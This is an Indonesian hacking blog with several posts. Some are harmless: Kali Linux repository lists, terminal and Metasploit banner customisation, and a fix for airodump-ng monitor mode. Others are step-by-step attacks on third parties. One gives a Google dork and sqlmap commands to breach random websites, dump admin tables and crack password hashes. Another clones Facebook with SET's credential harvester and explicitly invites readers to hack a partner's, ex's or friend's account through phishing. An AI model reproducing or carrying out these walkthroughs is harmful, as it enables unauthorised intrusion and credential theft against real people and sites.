Wednesday, 6 January 2016


Assalamualaikum Wr Wb
Kali Ini Admin Bakal  Share Official Repo Kali Linux dari 1.0 - 2.0
Oke Langsung aja ya;)
Pertama Ketik Di Terminal:
leafpad /etc/apt/sources.list

Kali 2.0

# Regular repositories
deb http://http.kali.org/kali sana main non-free contrib
deb http://security.kali.org/kali-security sana/updates main contrib non-free
# Source repositories
deb-src http://http.kali.org/kali sana main non-free contrib
deb-src http://security.kali.org/kali-security sana/updates main contrib non-free

Kali 1.0.9

## Security updates
deb http://security.kali.org/kali-security kali/updates main contrib non-free
deb http://http.kali.org/kali kali main non-free contrib
## Source Paket
deb-src http://http.kali.org/kali kali main non-free contrib deb-src
deb http://security.kali.org/kali-security kali/updates main contrib non-free

Kali 1.06

#Repo Official
deb http://http.kali.org/ /kali main contrib non-free
deb http://http.kali.org/ /wheezy main contrib non-free
deb http://http.kali.org/kali kali-dev main contrib non-free
deb http://http.kali.org/kali kali-dev main/debian-installer
deb-src http://http.kali.org/kali kali-dev main contrib non-free
deb http://http.kali.org/kali kali main contrib non-free
deb http://http.kali.org/kali kali main/debian-installer
deb-src http://http.kali.org/kali kali main contrib non-free
deb http://security.kali.org/kali-security kali/updates main contrib non-free
deb-src http://security.kali.org/kali-security kali/updates main contrib non-free

Kali 1.0 - 1.0.5

deb http://http.kali.org/ /kali main contrib non-free​
deb http://http.kali.org/ /wheezy main contrib non-free​
deb http://http.kali.org/kali kali-dev main contrib non-free​
deb http://http.kali.org/kali kali-dev main/debian-installer​
deb-src http://http.kali.org/kali kali-dev main contrib non-free​
deb http://http.kali.org/kali kali main contrib non-free​
deb http://http.kali.org/kali kali main/debian-installer​
deb-src http://http.kali.org/kali kali main contrib non-free​
deb http://security.kali.org/kali-security kali/updates main contrib non-free​
deb-src http://security.kali.org/kali-security kali/updates main contrib non-free​

JIka Ada yang error Mungkin Jarigan Sobat Yang Lelet,Jika Masih Error Silahkan Lapor Dengan Cara Menulis Di Kolom Komentar ;)

Hanya Itu saja yang saya bisa berikan,Untuk Kekurangan nya mohon dimaafkan :)
Sekian Dari saya Wassalamualaikum Wr Wb

Author : Hardian Alkori

Tuesday, 5 January 2016


Assalamualaikum Wr Wb

Kembali Lagi Di HardGhost Security,Oke Admin Kali Ini Akan Share Tentang Hacking Web Server.

Metode Hacking Nya Adalah Sql Injection,Dan Tahukah Sobat? 70% Situs Di Dunia Di Retas Dengan
Metode Sql Injection.
Sehingga Metode Ini Sangat Banyak Di Pakai Oleh Para Hacker.
Cara Kerja Sql Injection Ini Memanfaat kan kesalahan syntax di Database Server tsb.
Dengan Menginput query Untuk Menampilkan Isi Dari Database Target tsb.

Oke Lanjut ke Langkah Nya:

Dork:
inurl : product.php?id=
atau dork bisa di kembangkan lagi

1.Buka Terminal Dan Ketikan Perintah:
 sqlmap -u urltarget.com/product.php?id=77 --dbs

2.Jika Ada Pesan Tekan Y saja.

3.tunggu sampai selesai,Jika muncul Info Dengan Tulisan Berwarna Hijau Terang,Kemungkinan Berhasil
menembus Database Tsb,Sebalik Nya jika muncul Banyak Pesan Berwarna Merah/Kuning Kemungkinan Gagal.

4.Nah Jika Ada Pesan GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
Pilih N saja untuk mempercepat.

5.Tunggu Lagi Karna Sedang Proses Fetching Db,Jika Sudah Selesai Maka Database Telah di Tembus :D

6.Ketik Di Terminal.
sqlmap -u target/php.?id=4 -d nama database --tables

7.Tunggu Sebentar Dan Violaa Tabel Di Temukan :D

8.Cari Tabel berhubungan dengan admin karna situs yang saya gunakan tidak ada tabel admin jadi maaf tidak ada foto untuk seterus nya ,, ketik:
 sqlmap -u target.com/php.id?=4 -d nama database -t tabel --columns

9.Jika Selesai Mencari Kolom Nya lanjut dengan:
sqlmap -u target/php.?id=4 -d nama database -t admin --dump

10.dan informasi admin telah di temukan :D Jika Kolom Password nya Isi nya password aneh misal
5cd66cb6efx6g6nd6 atau gimana masuk ke hashkiller.co.uk untuk melihat password asli nya.

11.Jika sudah selanjutnya cari admin login nya (y)

Oke Sudah Bisa kan? Jika Situs Tidak Vuln Tinggal Cari lagi menggunakan dork tadi.
atau lihat video saya di sini:

Ya Hanya Itu Saja Yang Bisa Saya Berikan Semoga Bermanfaat :)

Offensive Say "Try Harder".

Wassalamualaikum Wr Wb

Author: Hardian Alkori

Assalamualaikum Wr Wb

Kali Ini admin bakal Share Cara "Membuat Phising Facebook Dengan Social Engineering Toolkit (SET),
Bagi Sobat Yang Mau Hack Fb Pacar,Mantan,Teman Bisa Ikuti Tutorial ini. :D

Perhatian: Ini Hanya Sebuah Pembelajaran,Admin Tidak Bertanggung Jawab Jika Ada hal yang tidak di inginkan.

Step By Step:

1.Buka Terminal Dan Ketikan Perintah ifconfig,Lalu Copy Ip sobat.

2.Buka SET Dengan Mengetikan:
  setoolkit

3.Setelah Dibuka PIlih 1.Social Engineering Attacks

4.Setelah Itu Pilih 2.Website Attacks Vectors

5.Kemudian Pilih 3.Credential Harvester Attacks Vector

6.Selanjutnya Pilih 2.Site Cloner.

7.Sobat Akan Di Mintakan IP Adress,Silahkan Paste Kan IP Sobat.

8.Masukan Site Yang Akan Di Cloning,Karna Facebook Jadi http://www.facebook.com
9.Masuk Ke direktori /var/www kemudian pilih file:
index.html
post.php
credentialblabla.txt

10.Pindahkan File Tsb Ke Dalam Folder Html.

11.Buka Terminal Dan Ketik Perintah
lighty-enable-mod cgi


Oke Fake Login Selesai Dibuat,Selanjutnya Kirim IP Kita Ke Target Dan Suruh Login Di Fake Login Kita,You Should Try Social Engineering Skills ;)

Untuk Hasil Bisa Di Lihat Di Direktori /var/www/html/credentialblablabla.txt

Dan Selesai !!

Di SET Ini Bukan Hanya Untuk Meng Cloning Web saja,Tapi Bisa Mencloning Acces Poin dan Untuk Kebutuhan Social Engineering Lain nya.

Sebenarnya Social Engineering Itu Apa sih?
Social engineering adalah manipulasi psikologis dari seseorang dalam melakukan aksi atau menguak suatu informasi rahasia.
Social engineering umumnya dilakukan melalui telepon atau Internet.
Social engineering merupakan salah satu metode yang digunakan oleh hacker untuk memperoleh informasi tentang targetnya,dengan cara meminta informasi itu langsung kepada korban
atau pihak lain yang mempunyai informasi itu. (Wikipedia)

Hanya Itu Saja Yang Bisa Saya Berikan Jika Ada Kekurangan Mohon Dimaafkan :)

Offensive Security Say "Try Harder"

Wassalamualaikum Wr Wb

Author: Hardian Alkori

Saturday, 2 January 2016



Assalamualaikum Wr Wb.

Kali Ini Admin bakal share tuorial "Cara Merubah Tampilan Metasploit".
Mungkin kalian bosen tampilan logo nya gitu gitu aja?
Nanti Tampilan nya Bakal Seperti Ini:


Oke Step By Step:

1.Pertama Rubah Dulu tampilan Terminal Sobat Tutorial nya ada Di Sini.

2.Sudah selesai merubah tampilan nya? Selanjutnya Copy Tulisan/Gambar Yang Ada di terminal.



3.Selanjutnya Masuk Ke direktori /usr/share/metasploit-framework/data/logos/

4.Pilih salah satu file txt dan buka,setelah di buka hapus yang ada di dalam file itu kemudian paste kan logo sobat,Disini saya memilih cowsay.txt


5.Supaya logo sobat terus muncul,Kalian Boleh Menghapus File Yang Lain atau memindahkan nya Ke direktori yang lain.
sehingga tersisa 1 file saja yaitu file logo kalian.


6.Terakhir Coba Ketik msfconsole di terminal dan Violaa....Tampilan nya berubah. :D

Oke Udah Bisa Kan Ngerubah Nya?
Selamat Bagi Yang sudah bisa ngerubah nya,Bagi yang belum silahkan coba dari awal dan baca dengan teliti,
atau tuliskan komentar kalian di kolom komentar jika tidak jelas ;)

Hanya Itu saja yang saya Berikan,Kurang Lebih nya Mohon Dimaafkan :)

Wassalamualaikum Wr Wb.

Author: Hardian Alkori


Assalamualaikum Wr Wb.

Masih Tentang Modding Tampilan Kali Linux,Admin kali ini bakal share tentang "Mempercantik tampilan Terminal Kali Linux."
Sebenernya sih bukan Kali Linux aja tapi Mungkin semua Distro Linux Bisa.
Nanti tuh tampilan nya seperti ini:



Step By Step:
1.install figlet dan cowsay dengan mengetikan perintah:
apt-get install figlet
apt-get install cowsay

2.Kemudian Copy Kode Di bawah ini

#!/bin/bash
# based on a function found in bashtstyle-ng 5.0b1
# Original author Christopher Roy Bratusek (http://www.nanolx.org)
# Last arranged by ayoli (http://ayozone.org) 2008-02-04 17:16:43 +0100 CET

function pre_prompt {
newPWD="${PWD}"
user="whoami"
host=$(echo -n $HOSTNAME | sed -e "s/[\.].*//")
datenow=$(date "+%a, %d %b %y")
let promptsize=$(echo -n "┌($user@$host ddd., DD mmm YY)(`date \"+%H:%M\"`)┐" \
                 | wc -c | tr -d " ")
let fillsize=${COLUMNS}-${promptsize}
fill=""
while [ "$fillsize" -gt "0" ]
do
    fill="${fill}─"
        let fillsize=${fillsize}-1
done
if [ "$fillsize" -lt "0" ]
then
    let cutt=3-${fillsize}
    newPWD="...$(echo -n $PWD | sed -e "s/\(^.\{$cutt\}\)\(.*\)/\2/")"
fi

}

PROMPT_COMMAND=pre_prompt

export black="\[\033[0;38;5;0m\]"
export red="\[\033[0;38;5;1m\]"
export orange="\[\033[0;38;5;130m\]"
export green="\[\033[0;38;5;2m\]"
export yellow="\[\033[0;38;5;3m\]"
export blue="\[\033[0;38;5;4m\]"
export bblue="\[\033[0;38;5;12m\]"
export magenta="\[\033[0;38;5;55m\]"
export cyan="\[\033[0;38;5;6m\]"
export white="\[\033[0;38;5;6m\]"
export coldblue="\[\033[0;38;5;33m\]"
export smoothblue="\[\033[0;38;5;111m\]"
export iceblue="\[\033[0;38;5;45m\]"
export turqoise="\[\033[0;38;5;50m\]"
export smoothgreen="\[\033[0;38;5;42m\]"
export myred="\[\033[01;31m\]"


case "$TERM" in
xterm)
   PS1="$myred┌─[$green\u@\h \$(date \"+%a, %d %b %y\")$myred]─\${fill}[$green\$(date \"+%H:%M\")\
$myred]──┐\n$myred└─[$green\$newPWD$myred]─>$white "
   ;;
screen)
   PS1="$white┌─[$myred\u@\h \$(date \"+%a, %d %b %y\")$white]─\${fill}[$myred\$(date \"+%H:%M\")\
$white]──┐\n$white└─[$myred\$newPWD$white]─>$white "
   ;;  
   *)
   PS1="┌─(\u@\h \$(date \"+%a, %d %b %y\"))─\${fill}─(\$newPWD\
)─┐\n└─(\$(date \"+%H:%M\") \$)─> "
   ;;
esac

# bash_history settings: size and no duplicates and no lines w/ lead spaces
exportHISTCONTROL="ignoreboth"
export HISTSIZE=1024

# aliases #############################################

# enable color support of ls and also add handy aliases
eval `dircolors -b`
alias ls='ls --color=auto'
alias dir='ls --color=auto --format=vertical'
alias vdir='ls --color=auto --format=long'

# some more ls aliases
alias ll='ls -lhX'
alias la='ls -A'
alias ldir='ls -lhA |grep ^d'
alias lfiles='ls -lhA |grep ^-'
#alias l='ls -CF'

# To see something coming into ls output: lss
alias lss='ls -lrt | grep $1'

# To check a process is running in a box with a heavy load: pss
alias pss='ps -ef | grep $1'

# usefull alias to browse your filesystem for heavy usage quickly
alias ducks='ls -A | grep -v -e '\''^\.\.$'\'' |xargs -i du -ks {} |sort -rn |head -16 | awk '\''{print $2}'\'' | xargs -i du -hs {}'

# cool colors for manpages
alias man="TERMINFO=~/.terminfo TERM=mostlike LESS=C PAGER=less man"

##########################################################
# enable programmable completion features (you don't need to enable
# this, if it's already enabled in /etc/bash.bashrc).
if [ -f /etc/bash_completion ]; then
   . /etc/bash_completion
fi
   figlet "   HardGh-st"

3.Buka Terminal dan ketikan perintah: leafpad .bashrc

4.Jika sudah dibuka hapus semua kode yang ada di situ dan paste kan kode yang telah di copy.

5.Jika ingin merubah tulisan HardGh-st nya,Sobat bisa merubah tulisan HardGh-st nya di paling bawah.

6.Tutup Terminal Dan buka Lagi Dan Violaaa... :D

Oke sudah berubah kan tampilan Terminal nya?
Jika ada yang masih blm bisa silahkan coba kembali dan baca tutorialnya dengan teliti ;)

hanya itu saja yang bisa saya berikan,Kurang lebih nya mohon dimaafkan :)
Wassalamualaikum Wr Wb

Author: Hardian Alkori

Assalamualaikum Wr Wb.

Banyak Yang bertanya di grup Facebook "Kok Airodump-ng ane gini? gak bisa dibuka."
Perlu Di Ketahui,Interface yang di gunakan di Kali Linux 2.0 dan Kali 1.x Berbeda,
Di Kali 1.x Masih Mengunakan mon0,Tapi di kali Linux 2.0 ini Sudah menggunakan wlan0mon,
Kenapa? Denger denger sih Katanya Versi Aircrack-ng Nya beda. :/

Di Kali Linux versi 1.x Jika setelah mengetik Perintah airmon-ng start wlan0,langsung bisa digunakan
untuk memonitor jaringan.
Tapi di Kali Linux 2.0 ini harus di set dulu untuk mengaktifkan Mode Monitor nya.
Jika tidak di setting dlu pasti kaya gini:


Untuk cara Fix nya Ketikan perintah ini berurutan:

airmon-ng start wlan0
ifconfig wlan0mon down
iwconfig wlan0mon mode monitor
ifconfig wlan0mon up



dan terakhir coba ketikan perintah

airodump-ng wlan0mon

Dan airodump-ng nya bisa di buka :D



Penutup:
Banyak yang nanya juga,"Kok Setelah Itu Gak bisa Connect Ke wifi/internetan?"
Ya Karna lagi aktif di mode monitor,untuk memulih kan nya lagi ketik di terminal:

airmon-ng stop wlan0mon

Ok sudah bisa kan?
Bagi yang kurang jelas silahkan tuliskan di kolom komentar ;)

Sekian Dari saya Kurang Lebih Nya Mohon di maafkan :)

Offensive Security Say "Try Harder"

Wassalamualaikum Wr Wb.

Author: Hardian Alkori

About Me

My Photo
Bekasi, Jawa Barat, Indonesia
HardGhost Security Blog Yang Membahas Tentang Programming,Networking Dan Securitty.
HardGhost Security 2016. Powered by Blogger.

Quote

Think Big Thoughts,But Relish Small Pleasure

Theme Support

BTricks

Video Pentesting

Popular Posts

Our Facebook Page